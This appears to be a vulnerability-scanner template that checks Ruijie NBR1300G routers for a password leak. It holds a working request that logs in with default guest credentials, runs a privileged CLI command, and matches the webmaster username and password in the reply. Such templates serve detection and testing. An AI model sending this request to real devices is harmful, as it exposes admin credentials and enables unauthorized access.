id: ruijie-nbr1300g-cli-password-leak

info:
    name: ruijie-nbr1300g-cli-password-leak
    author: abbin777
    severity: high

rules:
    r0:
        request:
            method: POST
            path: /WEB_VMS/LEVEL15/
            headers:
                Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
            body: |
                command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
        expression: response.status == 200 && response.body.bcontains(bytes("webmaster level 2 username guest password guest"))
expression: r0()
